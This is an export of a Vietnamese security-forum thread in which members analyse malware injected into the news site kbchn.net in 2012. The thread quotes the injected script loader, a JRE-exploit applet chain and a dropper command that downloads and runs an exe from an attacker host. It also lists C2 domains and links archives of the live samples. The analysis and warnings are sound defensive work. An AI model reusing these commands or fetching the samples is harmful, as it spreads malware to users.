<![CDATA[Latest posts for the topic "Trang KBCHN.NET bị chèn mã độc (28/3/2012)"]]> /hvaonline/posts/list/28.html JForum - http://www.jforum.net Trang KBCHN.NET bị chèn mã độc (28/3/2012) 23h ngày 28/3/2012 (GMT+7) 1. Đoạn mã khởi tạo đầu tiên được chèn vào cuối file http://kbchn.net/js/language/vi.js Code:
document.write('<script language="javascript" src="http://daily.us.to/js/jquery.php"></script>');
2. File jquery.php này chỉ trả về dữ liệu (javascript text) nếu trong HTTP header có: Code:
Referer: http://kbchn.net/
nếu Referer khác sẽ trả về "Error!". 3. Đoạn javascript này Code:
document.write(base64_decode('PGFwcGxldCB3aWR0aD0nMScgaGVpZ2.....
sẽ chèn một JAVA APPLET​​ chạy code thông qua exploit của JRE Code:
http://daily.us.to/js/MediaPlayer.jar
4. Mục đích chạy applet là tạo và thực thi 1 file .vbs (yahadfq.vbs) trong thư mục TEMP, khi file này chạy sẽ dùng CreateObject khởi tạo ADODB.Stream lưu lại file lấy từ 1 URL (dùng WinHttp.WinHttpRequest) Code:
start /MIN %temp%\yahadfq.vbs http://daily.us.to/js/rss.xml %temp%\phfvxlr.exe
--> File rss.xml là 1 exe sau khi tải về sẽ đổi tên thành phfvxlr.exe và chạy. Trong file exe này có 3 resource (TYPELIB 1000, 1010, 1011) với chuỗi header đầu tiên là MSFT. Đến đây em đuối rồi, đi tắm thôi #:S, các anh em nào rảnh thì RE con exe này tiếp xem thế nào. Tất cả các file em thu thập được trong quá trình phân tích: http://www.mediafire.com/?79yupp68ip3ogbq Pass: 123 Cached: Code:
http://liveweb.archive.org/http://kbchn.net/js/language/vi.js
 http://liveweb.archive.org/http://daily.us.to/js/MediaPlayer.jar
 http://liveweb.archive.org/http://daily.us.to/js/rss.xml
]]>
/hvaonline/posts/list/41771.html#260203 /hvaonline/posts/list/41771.html#260203 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260206 /hvaonline/posts/list/41771.html#260206 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)
và:
Các bạn stl bế tắc vậy sao trời? :-) ]]>
/hvaonline/posts/list/41771.html#260212 /hvaonline/posts/list/41771.html#260212 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260217 /hvaonline/posts/list/41771.html#260217 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) 5.tmp vào thư mục TEMP và thực thi file này, 5.tmp sẽ terminate process rss.exe, đổi tên rss.exe thành rss.tmp - Giải mã từ resource tạo file FBAgent.exe trong SYSTEM32, đây là file chính của trojan, khi chạy sẽ nâng quyền lên SYSTEM (chạy giống 1 service). - Giải mã từ resource tạo lại file rss.exe (kích thước nhỏ hơn rất nhiều), xóa file rss.tmp. File FBAgent.exe có code phát hiện máy ảo và debugger nên tạm thời chưa theo dõi tiếp được. http://www.mediafire.com/download.php?42c4ca67blcfksi Pass: 123]]> /hvaonline/posts/list/41771.html#260218 /hvaonline/posts/list/41771.html#260218 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260219 /hvaonline/posts/list/41771.html#260219 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260230 /hvaonline/posts/list/41771.html#260230 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

TQN wrote:
Hoan hô miyumi2. HVA ta đã có thêm 1 người giỏi về malwares analyze. stl chuyến này mệt rồi, thò vòi nào ra là bị chặt vòi đó. Code của cái đám mèo què này, em mới xem sơ sơ, 100% là code VC++ 2010 fake/hack Unikey site vừa rồi. Bà con mau mau download các file của miyumi2 vừa upload, submit lên các AVs. File rss.exe mà có size = 25k là file sạch, của MS, có signed và pdb symbol đàng hoàng. Bà con có thể xoá và không cần submit file đó. Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn. PS: Biết cái nghề RCE chi cho khổ vậy trời, muốn nghỉ ngơi, rữa tay gác kiếm mà cũng không yên. Giang hồ dậy sóng hoài ! 
Anh em nào không có khả năng RCE thì nên hỗ trợ cộng đồng bằng cách submit lên cho các AV @TQN: Em nhớ lịch sử HVA cũng có đoạn

caothuvolam wrote:
Chúng tôi xin mạn phép mượn lời của cố nhạc sĩ Diệp Minh Tuyền để nói lên bức xúc của HVA trước những hành động gây hấn của VHF: “Dù rằng đời ta thích hoa hồng, Kẻ thù buộc ta ôm cây súng” 
Lần này kẻ thù là stl :*- ]]>
/hvaonline/posts/list/41771.html#260231 /hvaonline/posts/list/41771.html#260231 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái, phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl. Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment). 
Cho mình ngoài lề một chút. Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan. Để khách quan các bạn có thể tham khảo nội dung phỏng vấn Thứ trưởng Bộ Ngoại Giao Việt Nam Nguyễn Thanh Sơn, (có đề cập đến KBCHN.NET): - http://www.youtube.com/watch?v=zPDnaUo1IPM - www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html (link gốc từ tienphong.vn bị lỗi truy cập, không biết có liên quan gì đến sự việc chèn mã độc này không?) - CACHED: http://webcache.googleusercontent.com/search?q=cache:REy4PSc50M8J:www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html+&cd=1&hl=vi&ct=clnk&gl=vn P/S: http://www.tienphong.vn/Tim-Kiem/Index.html?keyword=kbchn]]>
/hvaonline/posts/list/41771.html#260243 /hvaonline/posts/list/41771.html#260243 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

xuanphongdocco wrote:
Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang http://kbchn.net/ và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được. 

]]>
/hvaonline/posts/list/41771.html#260246 /hvaonline/posts/list/41771.html#260246 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

miyumi2 wrote:
Cho mình ngoài lề một chút. Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan. Để khách quan các bạn có thể tham khảo nội dung phỏng vấn Thứ trưởng Bộ Ngoại Giao Việt Nam Nguyễn Thanh Sơn, (có đề cập đến KBCHN.NET): - http://www.youtube.com/watch?v=zPDnaUo1IPM  
Mình thấy thứ trưởng Sơn đang làm chuyện chính trị ở xứ người.

miyumi2 wrote:
Cho mình ngoài lề một chút. Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan. - www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html (link gốc từ tienphong.vn bị lỗi truy cập, không biết có liên quan gì đến sự việc chèn mã độc này không?) - CACHED: http://webcache.googleusercontent.com/search?q=cache:REy4PSc50M8J:www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html+&cd=1&hl=vi&ct=clnk&gl=vn 
Họ chỉ nhắc đến cho bà con biết là có đoàn báo chí hải ngoại về Việt Nam để làm phóng sự Tết cho kiều bào ở nước ngoài "có một tầm nhìn và suy nghĩ về Xuân Quê Hương". Với lại bạn xem kĩ hơn đi, trong bài ghi là "báo mạng kbchn.vn" không phải báo mạng kbchn.net đâu ;) . Cho đến thời điểm hiện tại, không có một báo mạng có uy tín nào ở Việt Nam dẫn bài từ trang kbchn.net cả :) .]]>
/hvaonline/posts/list/41771.html#260254 /hvaonline/posts/list/41771.html#260254 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

TQN wrote:
Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn.  
Extract thêm được 1 chú từ FBAgent.exe: http://www.mediafire.com/download.php?yt996448h6z8ci7 Pass: 123]]>
/hvaonline/posts/list/41771.html#260256 /hvaonline/posts/list/41771.html#260256 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái (1), phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl (2). Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment). 
(1) Nó không phải là "lề trái" đâu em! Hì hì. Xem thử một vài bài, thí dụ bài này: http://kbchn.net/news/Hien-tuong-Viet-Tan/Viet-Tan-Va-Am-Muu-Dung-Lao-Dong-Viet-O-Dai-Loan-De-Chong-Pha-To-Quoc-2817/ (2) OK! Đúng như vậy Mình đang đi sâu vào một vài khía cạnh]]>
/hvaonline/posts/list/41771.html#260260 /hvaonline/posts/list/41771.html#260260 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

miyumi2 wrote:
Tiếp tục chạy file rss.xml (đổi tên thành rss.exe) sẽ thấy rất giống chiêu "Kim Thiền thoát xác" của trojan nhúng trong Unikey: - Tạo file 5.tmp vào thư mục TEMP và thực thi file này, 5.tmp sẽ terminate process rss.exe, đổi tên rss.exe thành rss.tmp - Giải mã từ resource tạo file FBAgent.exe trong SYSTEM32, đây là file chính của trojan, khi chạy sẽ nâng quyền lên SYSTEM (chạy giống 1 service). - Giải mã từ resource tạo lại file rss.exe (kích thước nhỏ hơn rất nhiều), xóa file rss.tmp. File FBAgent.exe có code phát hiện máy ảo và debugger nên tạm thời chưa theo dõi tiếp được. http://www.mediafire.com/download.php?42c4ca67blcfksi Pass: 123 
FBAgent.exe chính là một Trojạn, tên là: TR/Obess.A Trojạn này cũng xuất hiện trong một số file nằm trong gói tin 1 st.rar mà Mrs. Anonymous đăng tải lên mạng và cho là đã lấy ra trong các webserver của BKIS. Trong gói tin 1 st. rar nói trên có khá nhiều file có virus -trojan (khoảng xấp xỉ 50 files). Có một file được nhúng vào một Trojan y hệt như Trojan nhúng vào file Unikey (fake) download từ một URL trên website sourcefroce, giả URL của tác giả Unikey Pham kim Long. Có thời gian tôi sẽ viết thêm về vấn đề này. ( Chú ý: Cần làm rõ điều này: Hacker [có thể là STL] giả mạo một URL trong website sourcefroce.net, nơi mà user sẽ phải truy cập đến để download Unikey, chứ không phải là hacker dẫn người truy cập đến một website giả mạo bên ngoài, khác với sourceforce.net) ]]>
/hvaonline/posts/list/41771.html#260263 /hvaonline/posts/list/41771.html#260263 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

PXMMRF wrote:

bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái (1), phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl (2). Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment). 
(1) Nó không phải là "lề trái" đâu em! Hì hì. Xem thử một vài bài, thí dụ bài này: http://kbchn.net/news/Hien-tuong-Viet-Tan/Viet-Tan-Va-Am-Muu-Dung-Lao-Dong-Viet-O-Dai-Loan-De-Chong-Pha-To-Quoc-2817/  
Em thấy nội tình trang này phức tạp lắm anh nên anh khó mà khẳng định trang này không phải là web lề trái: http://kbchn.net/news/Tin-nguoi-Viet-Hai-Ngoai/BS-Nguyen-Xuan-Ngai-quan-niem-xay-dung-Phong-Trao-Dan-Chu-2764/ http://i.imgur.com/hbXAW.jpg Theo em thì với các trang báo điện tử ở hải ngoại thì đám stl không cần biết báo này là lề trái hay phải, chỉ cần đông bà con kiều bào vào xem trang báo là đủ tiêu chí để tấn công rồi, mục tiêu sau cùng là exploit, cài cắm trojan, theo dõi kiều bào và "bọn phản động".]]>
/hvaonline/posts/list/41771.html#260264 /hvaonline/posts/list/41771.html#260264 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

xuanphongdocco wrote:
Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được. 
Để đọc được file jquery.php trên webserver http://daily.us.to, bạn nên dùng "Malzilla" (thưc ra daily.us.to là một wordpress blog) Trên giao diện Malzilla, URL thì điền vào http://daily.us.to/js/jquery.php, còn Referrer thì điền vào: http://kbchn.net/. Rồi nhấn button "GET". Nôi dung File jquery.php hiện ra phía trên, dạng .txt, đươc encrypted. ------------------------ http://daily.us.to IP 184.170.246.91 HTTP/1.1 200 OK Server: nginx/1.0.9 Date: Thu, 29 Mar 2012 07:40:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.8 Set-Cookie: seafood=1 Master trên giống như là các master server điều khiển bot mà STL thường dùng. ]]>
/hvaonline/posts/list/41771.html#260269 /hvaonline/posts/list/41771.html#260269 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) http://cafeevn.com http://muaha.youdontcare.com Điều đặc biệt là trên hai website này chỉ có một file duy nhất (file index), với dòng chữ ngắn "index.html". Trình quản lý web cài đặt trong server (web server) cũng là NGINX:
HTTP headers: HTTP/1.1 200 OK Server: nginx/1.0.9 Date: Thu, 29 Mar 2012 08:39:57 GMT Content-Type: text/html Connection: close Content-Length: 11 Last-Modified: Mon, 14 Nov 2011 04:03:09 GMT Accept-Ranges: bytes 
Cả 3 website này đều của 1 hacker (chắc là STL)]]>
/hvaonline/posts/list/41771.html#260273 /hvaonline/posts/list/41771.html#260273 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)
Ban quản trị damau.org đành phải tạm đóng cửa để "tẩy trùng" và họ có liên hệ với tôi xin ý kiến. Rất tiếc, họ thông báo chính thức rồi mới liên hệ với tôi cho nên cái dojo.php bị xoá biến nên tôi không kịp điều tra nhưng xét ra, nhóm "chơi" damau.org chắc chắn là nhóm "chơi" kbchn.net. Nhớ lại hồi đầu giữa 2010, damau.org cũng bị chơi trò này một lần và lúc ấy, theo tôi tính toán thì hàng ngàn nhà văn, nhà thơ, độc giả và giới cầm bút thường xuyên viếng damau.org bị "dính trùng" của stl. Tôi đoán tôi cũng đã bị dính "trùng" trong khoảng thời gian ấy từ damau.org vì tôi viếng trang này khá thường xuyên ngay thời điểm sử dụng tạm laptop chạy Windows của công ty. Sau đó một thới gian ngắn, stl tiếp tục chơi trò cũ và phát tán với dạng java applet ở vài trang khác và nguồn "xml" lúc ấy là từ http://images.ohbah.com. Xét nội dung cái js, nội dung cái java applet và phương thức cấy vào máy nạn nhân và xét với những chi tiết kỹ thuật phát tán khác như: - giả mạo file xml rồi rename thành *.exe. - giả mạo một "well known" soft như "FBAgent.exe" của Asus hay "QTTask.exe" của Apple Quicktime (được dùng những lần trước) - những trò "kèm em bé" bên trong payload của binary. thì chắc chắn vụ này là stl chớ chẳng phải ai khác. Bởi vậy, một trong những ý kiến trên tôi mới nói stl "bế tắc vậy sao trời" là do họ không có gì mới. Cũng bao nhiêu đó thứ nhưng vẫn kiên trì chơi trò bại hoại này. Một chi tiết khá quan trọn cũng nên đề cập là stl không phá tan nát, không trưng "lệnh bài", không cho một dòng "triệt tiêu thêm một tên phản quốc" (chẳng hạn) với những site như damau.org và kbchn.net và một số trang tương tự là vì những trang này là những trang có nhiều người viếng và là nơi dễ dàng biến các độc giả và khách viếng thành nạn nhân của họ. Chỉ có những trang họ cảm thấy không khai thác được gì thì họ dập (deface) hoặc ddos cho tơi tả (nếu không deface được).]]>
/hvaonline/posts/list/41771.html#260278 /hvaonline/posts/list/41771.html#260278 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) Domain Name: CAFEEVN.COM Registrant: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Creation Date: 14-Nov-2011 Expiration Date: 14-Nov-2012 Domain servers in listed order: ns16.zoneedit.com ns5.zoneedit.com Administrative Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676  cafeevn.com:
Domain Name: CAFEEVN.COM Registrant: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Creation Date: 14-Nov-2011 Expiration Date: 14-Nov-2012 Domain servers in listed order: ns16.zoneedit.com ns5.zoneedit.com Administrative Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 
Quen thuộc hay lạ lẫm? ;). Không phải vô cớ mà tôi bảo "năm Thìn là năm cao số" =)) . Các bạn stl lắm tiền nhiều của. Domain này đi thì lấy domain khác, host này đi thì lấy host khác mà. Các ngài đại tá, thiếu tướng muốn tóm cổ stl dễ như trở bàn tay. Chỉ cần liên hệ với http://www.PublicDomainRegistry.com là có đầy đủ thông tin. Ha ha ha. ]]>
/hvaonline/posts/list/41771.html#260279 /hvaonline/posts/list/41771.html#260279 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260285 /hvaonline/posts/list/41771.html#260285 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

aedn wrote:
Xin hỏi ngoài nè là bọn stl là ai vậy, em có đọc mấy cài phân tích trên diễn đàn và có tải về cái file doc mà bác Conmale và chú TQN bị dính virus đó nghịch thì bị dính chưởng. Mà không hiểu sao không ai report abuse cái file doc đó cho AV nhỉ ta :-/ Em mới report cái doc file đó cho avira, avg và mse, mới có avira, avg nói là oki roài, còn mse thì bảo đang xem xét. Có bác nào nói sơ qua cái exploit của doc file đó đc hổng. Hơn nữa bọn stl tấn công các trang ở nước ngoài vậy, sao các trang đó không thu thập chứng cứ và kiện theo luật của nước sở tại nhỉ? Vì hầu hết các trang đều của người US, FR ... gốc việt mà. Theo em nghĩ thì họ nên đăng ký bảo hộ trang đó theo luật của nước sở tại. Nếu bọn stl mà là người việt thì nếu nó đi du lịch ngoài VN cũng sẽ bị tóm thôi. Nếu chúng ta có đủ chứng cứ :D Thân 
Nên tìm đọc đầy đủ thông tin rồi suy ngẫm trước khi phát biểu và nên tránh chen vào để hỏi những thứ không liên quan. Lần cảnh cáo này là lần cuối cùng dành cho bạn đó.]]>
/hvaonline/posts/list/41771.html#260287 /hvaonline/posts/list/41771.html#260287 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260289 /hvaonline/posts/list/41771.html#260289 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) 1. http://rock.yokiz.com/faq.php 2. http://nat.iwct.net/faq.php 3. http://web.zicur.com/faq.php 4. http://drive.nicpad.com/faq.php 5. http://ser.vailsx.com/index.php 6. http://lava.intraxs.net/index.php 7. http://fak.actcas.com/index.php  Mình tổng hợp lại các link mà service từ fake unikey (4 links đầu) và fake asus (3 link sau) sẽ connect tới.]]> /hvaonline/posts/list/41771.html#260304 /hvaonline/posts/list/41771.html#260304 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) daily.us.to nè: - Chạy với WordPress 3.3 - Cài một JavaScript (loại JQuery JavaScript) - code sẽ đươc tôi post lên sau - Trên website có một Form (user phải điền email address để Subscribe), nhưng dữ liệu điền vào form lai được chuyển đến một webserver khác là: http://sudarmuthu.com - sudarmuthu.com webserver này sử dụng một IP khác là 178.79.134.13, trong khi daily.us.to thì IP là IP 184.170.246.91, như nói ở trên. (Các bác STL nhiều webserver, IP quá) - Webserver sudarmuthu.com không đặt ở Atlanta USA (như daily.us.to ) mà đặt ở Anh quốc cơ. - Trên webserver có IP là 178.79.134.13 này, ngoài website http://sudarmuthu.com thì chỉ còn một website nữa là li190-13.members.linode.com, nhưng đây là reverse của sudarmuthu.com. Thấy các bác STL giầu và mạnh chưa nào?. Không tin các bạn check kỹ lại xem. Hì hì ]]> /hvaonline/posts/list/41771.html#260306 /hvaonline/posts/list/41771.html#260306 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) miyumi2 và rang0. Hai bạn đã giúp tiết kiệm rất nhiều thời gian để phân tích vụ này.]]> /hvaonline/posts/list/41771.html#260307 /hvaonline/posts/list/41771.html#260307 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260308 /hvaonline/posts/list/41771.html#260308 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

quygia128 wrote:
Bác miyumi2 extract cái file sao hay vậy ? (File thứ 3 bác gửi lên ấy 101.exe) quy bị terminate với thằng FBAgent.exe mà chưa tìm được giải pháp nè (chạy trên VirtualBox). 
Mình dùng "gậy ông đập lưng ông" tức là lợi dụng chính cái chiêu "Kim Thiền thoát xác" của mèo-què rss.xml đó mà ;-) Bật mí chút xíu là mình dùng chiêu này để moi từ trong bụng con ODSERV.EXE (con đẻ mèo què FakeUnikey, tạo service trong hệ thống với tên odservice) lấy ra được 1 file exe khác cũng có kích thước 59.392 bytes y chang kích thước file 101.exe (nội dung thì có khác đôi chút) :x @TQN: Anh đừng cười nha, em chưa học xong mấy trang bí kiếp RE của anh nên đành dùng chiêu này tạm vậy -:|- FakeUnikey_extract_01.zip: http://www.mediafire.com/download.php?13dbeapfrsmy4va Pass: 123]]>
/hvaonline/posts/list/41771.html#260312 /hvaonline/posts/list/41771.html#260312 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260329 /hvaonline/posts/list/41771.html#260329 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

chiro8x wrote:
Mình có theo dỏi bài viết của bạn miyumi2 trong những ngày gần đây, các bài viết xoay quanh malware và những idols của mình :D. Phân tích và quá trình lần theo dấu vết của bạn rất lý thú nhưng mình tự hỏi cái gì nằm ở bước 0 ?. Mình chỉ thấy bạn bắt đầu từ bước 1. Ý của mình là, duyên cớ nào bạn để ý tới : http://daily.us.to/js/jquery.php Hay thói quen của bạn là phân thích một trang web trước khi đọc nội dung của nó, hay đây là tình cờ ?. 
Chỉ là sự tình cờ thôi bạn à. Khi truy cập trang web này cũng như vô số trang khác từ Google thì Firefox bật lên thông báo missing plug-in, xem chi tiết thấy tên plug-in là Java Runtime.... Mình đoán là có vấn đề vì 1 trang web tin tức thì nhúng java applet để làm gì. View source HTML thì không thấy thẻ <APPLET> nào --> chắc là dùng javascript để write vào document --> tìm tiếp các file .js thì phát hiện ra file vi.js có url http://daily.us.to/js/jquery.php. Đơn giản là vậy thôi! :) ]]>
/hvaonline/posts/list/41771.html#260330 /hvaonline/posts/list/41771.html#260330 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

miyumi2 wrote:

chiro8x wrote:
Mình có theo dỏi bài viết của bạn miyumi2 trong những ngày gần đây, các bài viết xoay quanh malware và những idols của mình :D. Phân tích và quá trình lần theo dấu vết của bạn rất lý thú nhưng mình tự hỏi cái gì nằm ở bước 0 ?. Mình chỉ thấy bạn bắt đầu từ bước 1. Ý của mình là, duyên cớ nào bạn để ý tới : http://daily.us.to/js/jquery.php Hay thói quen của bạn là phân thích một trang web trước khi đọc nội dung của nó, hay đây là tình cờ ?. 
Chỉ là sự tình cờ thôi bạn à. Khi truy cập trang web này cũng như vô số trang khác từ Google thì Firefox bật lên thông báo missing plug-in, xem chi tiết thấy tên plug-in là Java Runtime.... Mình đoán là có vấn đề vì 1 trang web tin tức thì nhúng java applet để làm gì. View source HTML thì không thấy thẻ <APPLET> nào --> chắc là dùng javascript để write vào document --> tìm tiếp các file .js thì phát hiện ra file vi.js có url http://daily.us.to/js/jquery.php. Đơn giản là vậy thôi! :)  
Cho mình hỏi thêm, nếu máy có cài sẵn Java Runtime rồi thì nguy cơ dính virus là rất cao phải không bạn ? Nếu chèn vào trình hỗ trợ download các đuôi file EXE, COM, BAT, PIF, VBS thì có bắt được không ? P/s : Từ hôm qua giờ đọc topic nhưng không dám vào trang đó xem thử #:S ]]>
/hvaonline/posts/list/41771.html#260373 /hvaonline/posts/list/41771.html#260373 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260375 /hvaonline/posts/list/41771.html#260375 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

TQN wrote:
Update Java Runtime Enviroment đi. Mấy anh stl coder giờ đồng loạt chơi lên Visual Studio 2010 hết hà. Đồ mua hay đồ lậu đấy ? Chắc chắn là đồ lậu rồi. Sau một thời gian im hơi lặng tiếng, tu luyện, vậy mà code của mấy anh cũng chã lên tay gì cả, thất vọng quá đi mất, buồn, tắt máy, đi nhậu tiếp thôi :-(  
Phong cách viết bài của anh TQN chẳng thay đổi nhiều nhỉ :D. Tội nghiệp mấy idol của em :( bị nhận xét thẳng thừng quá.]]>
/hvaonline/posts/list/41771.html#260380 /hvaonline/posts/list/41771.html#260380 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260382 /hvaonline/posts/list/41771.html#260382 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260383 /hvaonline/posts/list/41771.html#260383 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

lenon wrote:

miyumi2 wrote:

chiro8x wrote:
Mình có theo dỏi bài viết của bạn miyumi2 trong những ngày gần đây, các bài viết xoay quanh malware và những idols của mình :D. Phân tích và quá trình lần theo dấu vết của bạn rất lý thú nhưng mình tự hỏi cái gì nằm ở bước 0 ?. Mình chỉ thấy bạn bắt đầu từ bước 1. Ý của mình là, duyên cớ nào bạn để ý tới : http://daily.us.to/js/jquery.php Hay thói quen của bạn là phân thích một trang web trước khi đọc nội dung của nó, hay đây là tình cờ ?. 
Chỉ là sự tình cờ thôi bạn à. Khi truy cập trang web này cũng như vô số trang khác từ Google thì Firefox bật lên thông báo missing plug-in, xem chi tiết thấy tên plug-in là Java Runtime.... Mình đoán là có vấn đề vì 1 trang web tin tức thì nhúng java applet để làm gì. View source HTML thì không thấy thẻ <APPLET> nào --> chắc là dùng javascript để write vào document --> tìm tiếp các file .js thì phát hiện ra file vi.js có url http://daily.us.to/js/jquery.php. Đơn giản là vậy thôi! :)  
Cho mình hỏi thêm, nếu máy có cài sẵn Java Runtime rồi thì nguy cơ dính virus là rất cao phải không bạn ? Nếu chèn vào trình hỗ trợ download các đuôi file EXE, COM, BAT, PIF, VBS thì có bắt được không ? P/s : Từ hôm qua giờ đọc topic nhưng không dám vào trang đó xem thử #:S  
Xài NoScript đi, chả sợ bố con thằng nào :-)]]>
/hvaonline/posts/list/41771.html#260386 /hvaonline/posts/list/41771.html#260386 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260387 /hvaonline/posts/list/41771.html#260387 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260389 /hvaonline/posts/list/41771.html#260389 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

angel_of_devil wrote:
Đang nói anh em IT mình mà anh :P  
Em đến giờ vẫn chưa thử vào site đó, nhưng phần lớn mình làm IT thì có biện pháp phòng ngừa cho user thường mà bro :P]]>
/hvaonline/posts/list/41771.html#260392 /hvaonline/posts/list/41771.html#260392 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260456 /hvaonline/posts/list/41771.html#260456 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

lenon wrote:

angel_of_devil wrote:
Đang nói anh em IT mình mà anh :P  
Em đến giờ vẫn chưa thử vào site đó, nhưng phần lớn mình làm IT thì có biện pháp phòng ngừa cho user thường mà bro :P 
Bạn phòng ngừa cho user thường thế nào vậy, bạn có thể chia sẻ được không :) ?]]>
/hvaonline/posts/list/41771.html#260458 /hvaonline/posts/list/41771.html#260458 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260474 /hvaonline/posts/list/41771.html#260474 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#260528 /hvaonline/posts/list/41771.html#260528 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) /hvaonline/posts/list/41771.html#261149 /hvaonline/posts/list/41771.html#261149 GMT